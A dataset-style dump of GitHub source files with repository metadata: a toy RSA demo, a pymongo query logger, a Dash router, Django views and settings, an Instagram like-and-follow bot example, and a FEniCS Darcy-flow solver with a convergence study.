    private_exponent = bezout_coefficients(totient, public_exponent)[1] % totient
    message = randrange(100)
    ciphertext = message ** public_exponent % modulus
    print(f'Bob encodes {message} as {ciphertext}.')
    print(f'Alice decodes {ciphertext} as {modular_exponentiation(ciphertext, private_exponent, modulus)}.')
def bezout_coefficients(a, b):
    '''
    Returns a pair (x, y) with ax + by = gcd(a, b), computed with the
    iterative extended Euclidean algorithm (floor division, so the same
    pair is produced for negative arguments as the recursive formulation).

    >>> bezout_coefficients(-1, 1)
    (0, 1)
    >>> bezout_coefficients(4, 6)
    (-1, 1)
    >>> bezout_coefficients(782, 253)
    (1, -3)
    >>> bezout_coefficients(-321, 654)
    (55, 27)
    '''
    x, next_x = 1, 0
    y, next_y = 0, 1
    while b:
        quotient = a // b
        a, b = b, a - quotient * b
        x, next_x = next_x, x - quotient * next_x
        y, next_y = next_y, y - quotient * next_y
    return x, y
def modular_exponentiation(x, n, p):
    '''
    Returns x^n (mod p), computed by iterative square-and-multiply.
    As in the recursive version, n == 0 yields 1 regardless of p.

    >>> modular_exponentiation(2, 0, 10)
    1
    >>> modular_exponentiation(2, 3, 10)
    8
    >>> modular_exponentiation(2, 5, 10)
    2
    >>> modular_exponentiation(7 * 10_000_000, 10_000_000, 94)
    12
    '''
    result = 1
    base = x % p
    while n:
        if n % 2:
            result = result * base % p
        base = base * base % p
        n //= 2
    return result
if __name__ == '__main__':
    # Run the doctests embedded in the docstrings above.
    import doctest
    doctest.testmod()
| [
"noreply@github.com"
] | noreply@github.com |
8deecf9ce3bdcb7373459cff5718007aee8af798 | 751970ea93f32967f0c986b449aec415ce2140a6 | /mongologger/__init__.py | 3c6bf3cea4240c04587d83c78cbd597e67a00e60 | [] | no_license | warvariuc/python-mongo-logger | 800bef339ae96ad1ec7e767aaee5602749f1bb2f | 6ad23270427b4f627e74487da6f3593cb7bc426b | refs/heads/master | 2021-01-18T16:27:55.120227 | 2015-07-07T06:07:14 | 2015-07-07T06:07:14 | 29,913,534 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,586 | py | """
Based on: https://gist.github.com/kesor/1589672
"""
from ._version import __version__
import logging
import time
import struct
import traceback
import inspect
from pymongo.mongo_client import MongoClient
import bson
from bson.errors import InvalidBSON
from bson import json_util
logger = logging.getLogger('mongologger')
def create_logger(until_modules=('pymongo', 'mongoengine'), stack_size=3):
    """Create and activate the Mongo-Logger.

    Args:
        until_modules (tuple): top-level module names until which the stack
            should be shown; pass an empty sequence to show the whole stack
        stack_size (int): how many frames before any of `until_modules` was
            entered to show; pass -1 to show the whole stack or 0 to show
            no stack

    Returns:
        the module logger when INFO logging is enabled, otherwise None.
    """
    # Logger.isEnabledFor() takes a numeric level; the original passed the
    # string 'info', which raises TypeError on Python 3 (and always compared
    # True on Python 2), so logging was never actually gated correctly.
    if not logger.isEnabledFor(logging.INFO):
        return
    # monkey-patch methods to record messages
    MongoClient._send_message = _instrument(MongoClient._send_message, until_modules, stack_size)
    MongoClient._send_message_with_response = _instrument(MongoClient._send_message_with_response,
                                                          until_modules, stack_size)
    return logger
def _instrument(original_method, until_modules, stack_size):
    """Wrap a pymongo send method so every call is timed and logged.

    The wrapped method's result is returned untouched; any failure while
    building the log line is reported but never propagated to the caller.
    """
    def wrapper(*args, **kwargs):
        started = time.time()
        result = original_method(*args, **kwargs)
        elapsed = time.time() - started
        try:
            message = decode_wire_protocol(args[1][1])
            stack = ('\n' + ''.join(get_stack(until_modules, stack_size))).rstrip()
            logger.info('%.3f %s %s %s%s', elapsed, message['op'], message['collection'],
                        json_util.dumps(message['query']), stack)
        except Exception as exc:
            logger.info('%.3f *** Failed to log the query *** %s', elapsed, exc)
        return result
    return wrapper
def get_stack(until_modules, stack_size):
    """Return formatted application-level stack frames for logging.

    Skips this function's own frame and its caller, drops the innermost run
    of frames belonging to any module in `until_modules`, then keeps at most
    `stack_size` of the remaining frames (a negative stack_size keeps all).
    Result is a list of strings from traceback.format_list.
    """
    # [2:] skips get_stack itself and the instrumented wrapper that called it
    frames = inspect.stack()[2:]
    frame_index = None
    for i, (frame, _, _, _, _, _) in enumerate(frames):
        module_name, _, _ = frame.f_globals['__name__'].partition('.')
        if module_name in until_modules:
            # remember the outermost frame of the matching (e.g. pymongo) run
            frame_index = i
        elif frame_index is not None:
            # found first frame before the needed module frame was entered
            break
    if frame_index is not None:
        del frames[:frame_index + 1]
    if stack_size >= 0:
        del frames[stack_size:]
    # NOTE(review): lines[0] assumes inspect returned source context for every
    # frame; frames without source (e.g. exec'd code) would make lines None.
    stack = [(filename, lineno, name, lines[0])
             for frame, filename, lineno, name, lines, _ in frames]
    return traceback.format_list(stack)
# Legacy MongoDB wire-protocol opcode -> operation name mapping.
MONGO_OPS = {
    2001: 'msg',
    2002: 'insert',
    2003: 'reserved',
    2004: 'query',
    2005: 'get_more',
    2006: 'delete',
    2007: 'kill_cursors',
}
def decode_wire_protocol(message):
    """ http://www.mongodb.org/display/DOCS/Mongo+Wire+Protocol

    Parse a raw wire-protocol message into a dict with keys
    op/collection/msg_id/skip/limit/query.  Written against Python 2 byte
    strings (str-based find('\0')); would need adjustment for py3 bytes.
    """
    # first 20 bytes: messageLength, requestID, responseTo, opCode, and the
    # first body int32 (flags for OP_QUERY), all little-endian
    _, msg_id, _, opcode, _ = struct.unpack('<iiiii', message[:20])
    op = MONGO_OPS.get(opcode, 'unknown')
    zidx = 20
    # the fully-qualified collection name is a NUL-terminated cstring
    collection_name_size = message[zidx:].find('\0')
    collection_name = message[zidx:zidx + collection_name_size]
    zidx += collection_name_size + 1
    # OP_QUERY: numberToSkip and numberToReturn follow the collection name
    skip, limit = struct.unpack('<ii', message[zidx:zidx + 8])
    zidx += 8
    try:
        msg = bson.decode_all(message[zidx:])
    except InvalidBSON:
        msg = 'invalid bson'
    return {
        'op': op, 'collection': collection_name, 'msg_id': msg_id, 'skip': skip, 'limit': limit,
        'query': msg,
    }
| [
"victor.varvariuc@gmail.com"
] | victor.varvariuc@gmail.com |
cbf3fc3e1c010cf4650748884952e3aa984b29ec | 6dbc183ba0c2f6722f343adc097447bcffe60934 | /index.py | 7b8ac5c47ff40ca6d17084dae07a261ffd29a357 | [] | no_license | slaytor/ODIE | ce32b0f97ba809b439f3ca3a5ff0b38ce34951e6 | 62588f663762930ee2383f3b1244795aeacf7b8c | refs/heads/master | 2022-12-14T22:49:02.024643 | 2018-06-04T16:57:05 | 2018-06-04T16:57:05 | 136,056,115 | 0 | 0 | null | 2022-12-08T01:00:27 | 2018-06-04T16:51:48 | Python | UTF-8 | Python | false | false | 1,615 | py | from dash.dependencies import Input, Output
import dash_core_components as dcc
import dash_html_components as html
import dash_table_experiments as dt
from app import app, server
from apps import home, jobs_app, ind_app, heatmap_app
from header_footer import header, footer
# External stylesheets: dash base styles, custom overrides, font and icon sets.
css = [
    'https://cdn.rawgit.com/plotly/dash-app-stylesheets/8485c028c19c393e9ab85e1a4fafd78c489609c2/dash-docs-base.css',
    'https://dl.dropboxusercontent.com/s/t8d6kluyt7y1sls/custom.css?dl=0',
    'https://fonts.googleapis.com/css?family=Dosis',
    'https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css'
]
# External scripts: analytics tag.
js = ['https://cdn.rawgit.com/slaytor/Projects/ba3e394f/gtag.js']
# Top-level page skeleton: URL tracker, a hidden DataTable (presumably so the
# dash_table_experiments assets get loaded — verify), header, routed content
# area filled by the display_page callback, and footer.
app.layout = html.Div([
    dcc.Location(id='url', refresh=False),
    html.Div(dt.DataTable(rows=[{}]), style={'display': 'none'}),
    header,
    html.Div([
        html.Div(id='page-content'),
    ],
        className='content-container',
        style={'margin-left': '30', 'margin-right': '30'}),
    footer,
])
@app.callback(Output('page-content', 'children'),
              [Input('url', 'pathname')])
def display_page(pathname):
    """Route the current URL pathname to the matching app layout ('404' otherwise)."""
    if pathname in ('/', '/apps/jobs_app'):
        return jobs_app.layout
    if pathname == '/apps/ind_app':
        return ind_app.layout
    if pathname == '/apps/heatmap_app':
        return heatmap_app.layout
    return '404'
# Serve assets from the external URLs above rather than packaged local files.
app.scripts.config.serve_locally = False
app.css.append_css({'external_url': css})
app.scripts.append_script({'external_url': js})
if __name__ == '__main__':
    app.run_server(debug=True)
| [
"noreply@github.com"
] | noreply@github.com |
efc7edcca15e51d14d5224f7a0a28ee36f478f76 | d185edc1927a7ba4744af04435cfe61812596200 | /cms/views.py | 886138346b1bbf6564aac8b8fef96c76fc26c4dc | [] | no_license | PrzemyslawKuston/DjangoCMS | 51a69fba9ce781713a96641481eb5f9afe44bc22 | 35f29c5305ee179c7bb2ab845c80c053d819a110 | refs/heads/master | 2021-01-02T09:08:50.129259 | 2017-01-11T19:38:52 | 2017-01-11T19:38:52 | 75,053,757 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,605 | py | from django.shortcuts import render, render_to_response, redirect
from django.http import HttpResponseRedirect
from django.contrib import auth
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth import authenticate, login
from django.contrib.auth import logout
from notifications.models import Notifications
def index(request):
    """Render the public landing page."""
    return render(request, 'index.html')
def about(request):
    """Render the static about page."""
    return render(request, 'about.html')
#--- nowe
def login(request):
    """Render the login form.

    NOTE(review): this view shadows django.contrib.auth.login imported above;
    that import is effectively unused because auth_view calls auth.login.
    """
    c = {}
    return render(request, 'login.html', c)
def auth_view(request):
    """Authenticate POSTed credentials; redirect to the logged-in page on
    success, to the invalid-login page otherwise."""
    username = request.POST.get('username', '')
    password = request.POST.get('password', '')
    user = auth.authenticate(username=username, password=password)
    if user is None:
        return HttpResponseRedirect('/accounts/invalid/')
    auth.login(request, user)
    return HttpResponseRedirect('/accounts/loggedin/')
def loggedin(request):
    """Show the logged-in dashboard with the user's unseen notifications."""
    return render(request, 'loggedin.html',{'user_name' : request.user.username, 'notifications': Notifications.objects.filter(user=request.user, viewed=False)})
def logout(request):
    """Log the current user out and render the logout page.

    NOTE(review): shadows django.contrib.auth.logout imported above; the
    auth.logout call below still resolves via the auth module.
    """
    auth.logout(request)
    return render_to_response('logout.html')
def invalid_login(request):
    """Render the failed-login page."""
    return render_to_response('invalid_login.html')
def create_user(request):
    """Display the registration form and create a new user on a valid POST.

    Fixes two defects in the original:
    * the success path called ``render(request, '/accounts/create_user_success/')``,
      passing a URL where a template name is expected (TemplateDoesNotExist at
      runtime) — it now redirects, matching the other views in this module;
    * an invalid POST discarded the bound form, so validation errors were
      never shown — the bound form is now re-rendered.
    """
    if request.method == 'POST':
        form = UserCreationForm(request.POST)
        if form.is_valid():
            form.save()
            return HttpResponseRedirect('/accounts/create_user_success/')
    else:
        form = UserCreationForm()
    return render(request, 'create_user.html', {'form': form})
def create_user_success(request):
    """Render the confirmation page shown after successful registration."""
    return render(request,'create_user_success.html')
| [
"Prz Kus"
] | Prz Kus |
ab0e5016475d187376e113b7f16bdf8f3b8390c3 | 70c724f693f5f097fa8dcc5ab4c76398fc753658 | /examples/like_and_follow_your_last_media_likers.py | 0872e03ff5f0a9a2901f41108fb862367088ebee | [
"Apache-2.0"
] | permissive | Plushkin/instabot | 9e1354f5bdd5527c34682d1e845ab3d8a6ce4255 | 757724071e6925fff42a5148da95c24caa4ed248 | refs/heads/master | 2020-05-25T22:53:44.506154 | 2017-04-01T19:19:52 | 2017-04-01T19:19:52 | 84,976,210 | 2 | 0 | null | 2017-04-01T19:19:53 | 2017-03-14T17:09:13 | Python | UTF-8 | Python | false | false | 1,158 | py | """
instabot example
Workflow:
Like and follow likers of last medias from your timeline feed.
"""
import sys
import os
import time
import random
from tqdm import tqdm
import argparse
sys.path.append(os.path.join(sys.path[0], '../'))
from instabot import Bot
def like_and_follow(bot, user_id, nlikes=3):
    """Like up to `nlikes` of the user's media and follow them; returns True."""
    bot.like_user(user_id, amount=nlikes)
    bot.follow(user_id)
    return True
def like_and_follow_media_likers(bot, media, nlikes=3):
    """Like `nlikes` posts of, and follow, every liker of `media`.

    A randomized 10-30s pause between users keeps the bot rate-limited.
    Returns True when the whole likers list has been processed.
    """
    for user in tqdm(bot.get_media_likers(media), desc="Media likers"):
        # forward nlikes — the original ignored it and always used the default
        like_and_follow(bot, user, nlikes)
        time.sleep(10 + 20 * random.random())
    return True
def like_and_follow_your_feed_likers(bot, nlikes=3):
    """Like and follow the likers of your own most recent media.

    Returns the result of processing that media's likers list.
    """
    last_media = bot.get_your_medias()[0]
    # forward nlikes instead of hard-coding 3 (the parameter was ignored before)
    return like_and_follow_media_likers(bot, last_media, nlikes)
# Command-line entry point: credentials and an optional proxy for the session.
parser = argparse.ArgumentParser(add_help=True)
parser.add_argument('-u', type=str, help="username")
parser.add_argument('-p', type=str, help="password")
parser.add_argument('-proxy', type=str, help="proxy")
args = parser.parse_args()
bot = Bot()
bot.login(username=args.u, password=args.p,
          proxy=args.proxy)
like_and_follow_your_feed_likers(bot)
| [
"ohl.d@yandex.ru"
] | ohl.d@yandex.ru |
ed67b6e7582630336f0732062ed755324b0218de | f0ffb4276e72b1f8759bea4cbd7f711c2de54848 | /coursereg/views.py | df9e81d4c216b6e8b60b2df1eaaae9eb564eefd0 | [] | no_license | shirmino/School-management-app | 16ed86cf6a8ce678d6ff89a9d95c741f4bd51458 | 6498ef43463b4c1e302f89574052cf0fb7a06519 | refs/heads/master | 2022-11-25T09:02:10.036942 | 2020-07-19T12:55:51 | 2020-07-19T12:55:51 | 280,671,953 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 851 | py | from django.shortcuts import render, redirect
from .models import CourseModel
from django.contrib.auth.decorators import login_required
from . import forms
from django.contrib.auth.models import User
# Create your views here.
@login_required(login_url="/accounts/login/")
def course_create(request):
    """Render the course-creation form; on a valid POST save the course for
    the current user and redirect to the course list.  An invalid POST
    re-renders the bound form so its errors are shown."""
    if request.method != 'POST':
        return render(request, 'coursereg/course_create.html',
                      {'form': forms.CourseForm()})
    form = forms.CourseForm(request.POST)
    if not form.is_valid():
        return render(request, 'coursereg/course_create.html', {'form': form})
    course = form.save(commit=False)
    course.User = request.user
    course.save()
    return redirect('coursereg:course_list')
@login_required
def course_list(request):
    """List the logged-in user's courses ordered by date.

    NOTE(review): unlike course_create, this decorator omits login_url, so it
    falls back to the global LOGIN_URL setting — confirm that's intended.
    """
    courses = CourseModel.objects.all().filter(User = request.user).order_by('date')
    return render(request, 'coursereg/course_list.html', {'courses': courses})
"Uche@yahoo.com"
] | Uche@yahoo.com |
4171f3f9288b6953d7b6ea9c6d40cec41f3b8406 | 9f1039075cc611198a988034429afed6ec6d7408 | /tensorflow-stubs/contrib/slim/python/slim/nets/inception_v3.pyi | df9dccde040bd84ccfd994e2ec65a1450b9e965f | [] | no_license | matangover/tensorflow-stubs | 9422fbb1cb3a3638958d621461291c315f9c6ec2 | 664bd995ef24f05ba2b3867d979d23ee845cb652 | refs/heads/master | 2020-05-23T12:03:40.996675 | 2019-05-15T06:21:43 | 2019-05-15T06:21:43 | 186,748,093 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,288 | pyi | # Stubs for tensorflow.contrib.slim.python.slim.nets.inception_v3 (Python 3)
#
# NOTE: This dynamically typed stub was automatically generated by stubgen.
from tensorflow.contrib import layers as layers
from tensorflow.contrib.framework.python.ops import arg_scope as arg_scope
from tensorflow.contrib.layers.python.layers import initializers as initializers, regularizers as regularizers
from tensorflow.python.framework import ops as ops
from tensorflow.python.ops import array_ops as array_ops, init_ops as init_ops, nn_ops as nn_ops, variable_scope as variable_scope
from typing import Any as Any, Optional as Optional
# Auto-generated stub declarations for the slim Inception-v3 module.
trunc_normal: Any

def inception_v3_base(inputs: Any, final_endpoint: str = ..., min_depth: int = ..., depth_multiplier: float = ..., scope: Optional[Any] = ...): ...
def inception_v3(inputs: Any, num_classes: int = ..., is_training: bool = ..., dropout_keep_prob: float = ..., min_depth: int = ..., depth_multiplier: float = ..., prediction_fn: Any = ..., spatial_squeeze: bool = ..., reuse: Optional[Any] = ..., scope: str = ...): ...
def inception_v3_arg_scope(weight_decay: float = ..., batch_norm_var_collection: str = ..., batch_norm_decay: float = ..., batch_norm_epsilon: float = ..., updates_collections: Any = ..., use_fused_batchnorm: bool = ...): ...
| [
"matangover@gmail.com"
] | matangover@gmail.com |
0b0598fdad0660c69040b729f8d2a2816d4e62e3 | b3db91714f9fcc4ebf3d41945d6f8247a747a2c5 | /webapp/news/parsers/utils.py | c0ffc729f1414fc626345d45b45dfea1df697859 | [] | no_license | Killarayne/petpj | 54fdb3d21159c2446a2dea2ba4c029f7f32c53f5 | e90b74bc00362b8ba32315fdd3e742130bc66426 | refs/heads/main | 2023-03-01T10:25:21.893944 | 2021-02-16T14:11:46 | 2021-02-16T14:11:46 | 339,421,349 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 753 | py | import requests
from webapp.db import db
from webapp.news.models import News
def get_html(url):
    """Fetch `url` with a desktop browser User-Agent.

    Returns the response body as text, or False after printing a network-error
    message when the request fails or returns a non-2xx status.
    """
    headers = {
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36'}
    try:
        response = requests.get(url, headers=headers)
        response.raise_for_status()
        return response.text
    except (requests.RequestException, ValueError):
        print('Сетевая ошибка')
        return False
def save_news(title, url, published):
    """Insert a news row unless one with the same URL is already stored."""
    already_stored = News.query.filter(News.url == url).count()
    if already_stored:
        return
    db.session.add(News(title=title, url=url, published=published))
    db.session.commit()
| [
"saltykovnikson@gmail.com"
] | saltykovnikson@gmail.com |
7f53c10d5dbe029fa5168d836eba8d9522b3c2a5 | b551729392b06176f1b56894cb693d7fd70663cf | /mydj/settings.py | 1894bfb71c40159da9fc8b52c86c44f30137fa34 | [] | no_license | deepak-arora92/Your-Opinion-Matters-Django- | 0e3a11b6f26d4871e73b3878207435d3d0a88518 | db7b0731633d4aa77702c29c8f04ce005f95c8bb | refs/heads/master | 2022-10-21T21:28:59.171057 | 2016-03-27T17:46:59 | 2016-03-27T17:46:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,282 | py | """
Django settings for mydj project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '58)%t#37%4lkvr&_37h-08&g5+x@j-&9#q)mwp6xjaio92&_a8'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'south',
'mydj',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'mydj.urls'
WSGI_APPLICATION = 'mydj.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
# NOTE(review): credentials are hard-coded placeholders; load them from the
# environment before using this settings module anywhere shared.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.mysql',
        'NAME': 'mydatabase',
        'USER': 'user',
        'PASSWORD': 'password',
        'HOST': '127.0.0.1',
        'PORT': '3306',
        'OPTIONS': { 'init_command': 'SET character_set_connection=utf8,collation_connection=utf8_unicode_ci'}
    }
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
TEMPLATE_PATH = os.path.join(BASE_DIR,"mydj", 'templates')
TEMPLATE_DIRS = (TEMPLATE_PATH,)
| [
"divinedeepak92@gmail.com"
] | divinedeepak92@gmail.com |
2efa465be4837e8a72faa9a4b74dfac988eb9b4f | 5cf33318ce43d5a7fbdecf33dc27bde2cca7fe10 | /userlogin/models.py | e7c8d0ede2d7dffbea21e3880fcb576d0834ee89 | [] | no_license | priyamkhandelwal/Conferenecesystem | 19efca4b1f6b91e36e47d80326b8190a96217edd | af30ae0865c62a0455ad606d89f95b48144b1845 | refs/heads/master | 2020-12-25T16:47:36.484227 | 2017-03-16T12:46:24 | 2017-03-16T12:46:24 | 66,699,680 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 673 | py | from __future__ import unicode_literals
from django.db import models
from django.contrib.auth.models import User
from conference.models import Conference
# Create your models here.
class ProfilePic(models.Model):
    """Uploaded profile picture; files are stored under 'documents'."""
    # null/default allow a row to exist with no file attached
    picFile = models.FileField(upload_to='documents',default=None,null=True)
class UserProfile(models.Model):
    """Per-user profile data keyed one-to-one to the auth User."""
    user = models.OneToOneField(User,on_delete=models.CASCADE,primary_key=True)
    # presumably the account's role/category — verify against callers
    usertype = models.CharField(max_length=50,blank=True)
    contactNo = models.CharField(max_length=20)
    pic = models.OneToOneField(ProfilePic,null=True,blank=True)
    # conferences the user has registered for
    regconf = models.ManyToManyField(Conference,blank=True)
    def __str__(self):
        # NOTE(review): first_name may be empty, yielding a blank display name
        return self.user.first_name
| [
"priyamkhandelwalbtp@gmail.com"
] | priyamkhandelwalbtp@gmail.com |
6ff7b77d79410b97d84138f416f8c32691a2d8bb | 1312d27f4d2e264e7ea20cf7e76ea50d344c8dbe | /Appendix_1.py | 9e5f1ec3aadb49c99140474a3c44efe2c2a088a1 | [
"BSD-3-Clause"
] | permissive | haf001/Master-Thesis | 33c1d5e2dbc0b4070fe849bf5321aca3b1afee55 | 67af51cf5e40135f1ce4f8d71218739188232eac | refs/heads/master | 2020-05-20T05:19:29.947677 | 2019-06-12T09:20:46 | 2019-06-12T09:20:46 | 185,402,767 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,273 | py | from fenics import *
import numpy as np
from ufl import nabla_div
import sympy as sym
import matplotlib.pyplot as plt
def solver(f, p_e, phi, K_val, mesh, degree):
    """
    Solving the Darcy flow equation for a Unit Square Medium with Pressure Boundary Conditions.

    Solves -div(K grad p) = f on `mesh` in a degree-`degree` Lagrange space,
    with p = 1 on the left edge (x=0) and p = 0 on the right edge (x=1).
    `p_e` and `phi` are accepted for interface symmetry but unused here.
    Returns the computed pressure as a FEniCS Function.
    """
    # Defining the function space
    V = FunctionSpace(mesh, 'P', degree)
    # Defining Dirichlet Boundary Conditions
    p_L = Constant(1.0)
    def boundary_L(x, on_boundary):
        return on_boundary and near(x[0], 0)
    bc_L = DirichletBC(V, p_L, boundary_L)
    p_R = Constant(0.0)
    def boundary_R(x, on_boundary):
        return on_boundary and near(x[0], 1)
    bc_R = DirichletBC(V, p_R, boundary_R)
    bcs = [bc_L, bc_R]
    # Defining the variational problem: a(p, v) = L(v)
    p = TrialFunction(V)
    v = TestFunction(V)
    K = K_val
    a = dot(K*grad(p), grad(v))*dx
    L = inner(f, v)*dx
    # Computing Numerical Pressure
    p = Function(V)
    solve(a == L, p, bcs)
    return p
def run_solver():
"Run solver to compute and post-process solution"
mesh = UnitSquareMesh(50, 50)
# Setting up problem specific parameters where p_e = 1 - x^2 and calling solver
p_e = Expression('1 - x[0]*x[0]', degree=2)
phi = Constant(0.3)
d = 2
I = Identity(d)
M = Expression('fmax(0.10, exp(-pow(10.0*x[1]-1.0*sin(10.0*x[0])-5.0, 2)))', degree=2, domain=mesh)
K_val = M*I
K = K_val
# The components for term grad_p_e below is made up of the differentials of p_e with respect to x and y respectively
grad_p_e = Expression(('-2*x[0]', '0.0'), degree=1, domain=mesh)
# Defining the source term
f = nabla_div(dot(-K, grad_p_e))
# Calling Solver
p = solver(f, p_e, phi, K, mesh, 1)
# Evaluating and projecting the Darcy velocity profile, w
w_1 = -K*grad(p)
w = project(w_1, VectorFunctionSpace(mesh, 'P', degree=1))
# Evaluating and projecting the Fluid velocity profile, uf
uf_1 = w_1/phi
uf = project(uf_1, VectorFunctionSpace(mesh, 'P', degree=1))
# Saving numerical solutions for visualization
xdmf = XDMFFile('Numerical_Pressure_Gradient.xdmf')
p.rename('Pressure', '')
xdmf.write(p)
xdmf.close()
xdmf = XDMFFile('Darcy_Velocity_Profile.xdmf')
w.rename('Darcy_velocity', '')
xdmf.write(w)
xdmf.close()
xdmf = XDMFFile('Fluid_Velocity_Profile.xdmf')
uf.rename('Fluid_velocity', '')
xdmf.write(uf)
xdmf.close()
def iterate_solver():
    """Convergence study: solve on meshes m = 4..376 (step 4) and collect
    cell size h, L2 error E, degrees of freedom DOF, and the energy integrals
    of the numerical (GPS) and reference (GPES) pressure gradients.

    Prints the fitted log-log slope (the L2 convergence rate) and returns
    the tuple (E, h, DOF, GPS, GPES) of per-mesh lists.
    """
    # Setting up parameters for iteration
    p_e = Expression('1 - x[0]*x[0]', degree=2)
    # Iterating over mesh number m, and appending the respective Cell Sizes h, resulting L2 Error E, Degree of freedom DOF and integral of grad(p)*grad(p) over domain GPS
    E = []
    h = []
    DOF = []
    GPS = []
    GPES = []
    for m in range (4, 380, 4):
        mesh = UnitSquareMesh(m, m)
        V = FunctionSpace(mesh, 'P', 1)
        # reference pressure interpolated into a higher-order space for errornorm
        p_e_f = interpolate(p_e, FunctionSpace(mesh, 'P', 2))
        phi = Constant(0.3)
        d = 2
        I = Identity(d)
        M = Expression('fmax(0.10, exp(-pow(10.0*x[1]-1.0*sin(10.0*x[0])-5.0, 2)))', degree=2, domain=mesh)
        K = M*I
        grad_p_e = Expression(('-2*x[0]', '0.0'), degree=1, domain=mesh)
        f = nabla_div(dot(-K, grad_p_e))
        # Calling solver
        p = solver(f, p_e, phi, K, mesh, degree=1)
        # Computing for L2 Error Norm and Cell Sizes h
        E1 = errornorm(p_e_f, p, 'L2')
        print('E1=', E1)
        E.append(E1)
        h.append(mesh.hmin())
        DOF.append(len(V.dofmap().dofs()))
        IGPS = assemble(inner(grad(p), grad(p))*dx)
        GPS.append(IGPS)
        IGPES = assemble(inner(grad(p_e_f), grad(p_e_f))*dx)
        GPES.append(IGPES)
    # NOTE(review): the *a arrays below other than Logha/LogEa are computed but unused
    Ea = np.array(E)
    ha = np.array(h)
    DOFa = np.array(DOF)
    GPSa = np.array(GPS)
    GPESa = np.array(GPES)
    # Computing the Logs of L2 Error and Cell Sizes h with print of the Convergence Rate
    LogEa = np.log(Ea)
    Logha = np.log(ha)
    LogDOFa = np.log(DOFa)
    LogGPSa = np.log(GPSa)
    # the first number printed in the script below is the gradient of the Log plot of L2 Error against cell size, h. This is the error convergence rate.
    print(np.polyfit(Logha, LogEa, deg=1))
    return (E, h, DOF, GPS, GPES)
if __name__ == '__main__':
    # Driver: one solve for the visualization files, then the convergence
    # study, followed by diagnostic plots saved as PNGs.
    run_solver()
    E, h, DOF, GPS, GPES = iterate_solver()
    # Log plot of L2 Error E against Cell Sizes h, the gradient of the line gives the convergence rate as well
    x = np.log(h)
    y = np.log(E)
    plt.plot(x,y)
    plt.title('Log of L2 Error vs. Log of Cell Sizes h')
    plt.xlabel('Log Cell Size, h')
    plt.ylabel('Log L2 Error')
    plt.savefig('Log_L2_Error_vs_Log_Cell_Sizes_h.png')
    # Semilog plot of L2 Error against DOF
    plt.figure()
    plt.semilogy(DOF, E)
    plt.title('Semilog L2 Error vs DOF')
    plt.xlabel('DOF')
    plt.ylabel('L2 Error')
    plt.savefig('Semilog_L2_Error_vs_DOF.png')
    # Log plot of L2 Error against DOF
    plt.figure()
    x = np.log(DOF)
    y = np.log(E)
    plt.plot(x,y)
    plt.title('Log L2 Error vs. Log DOF')
    plt.xlabel('Log DOF')
    plt.ylabel('Log L2 Error')
    plt.savefig('Log_L2_Error_vs_Log_DOF.png')
    # Log plot of Integral of grad(p) squared over Omega (GPS) against Cell Sizes h for Mesh Independence
    plt.figure()
    x = np.log(h)
    y = np.log(GPS)
    plt.plot(-x,y)
    # dotted guides mark the visually-chosen mesh-independence point
    plt.axvline(x=4.0, color='r', linestyle='dotted')
    plt.axhline(y=0.28768, color='r', linestyle='dotted')
    plt.title('Log Integral of grad(p)*grad(p) over omega vs. -Log Cell Size, h')
    plt.xlabel('-Log Cell Size, h')
    plt.ylabel('Log of Integral of grad(p) squared over omega')
    plt.savefig('Log_integral_of_grad_p_square_vs_-Log_Cell_Size_h.png')
    # Plot of (GPES-GPS) against Cell Size, h
    plt.figure()
    x = h
    y = np.log(GPES)-np.log(GPS)
    plt.plot(-np.log(x), y)
    plt.axvline(x=4.0, color='r', linestyle='dotted')
    plt.axhline(y=0.00001, color='r', linestyle='dotted')
    plt.title('Log GPES - Log GPS vs. -Log Cell Size, h')
    plt.xlabel('-Log Cell Size, h')
    plt.ylabel('Log GPES - Log GPS')
    plt.savefig('Log_GPES-Log_GPS_vs_-Log_Cell_Size_h.png')
| [
"noreply@github.com"
] | noreply@github.com |
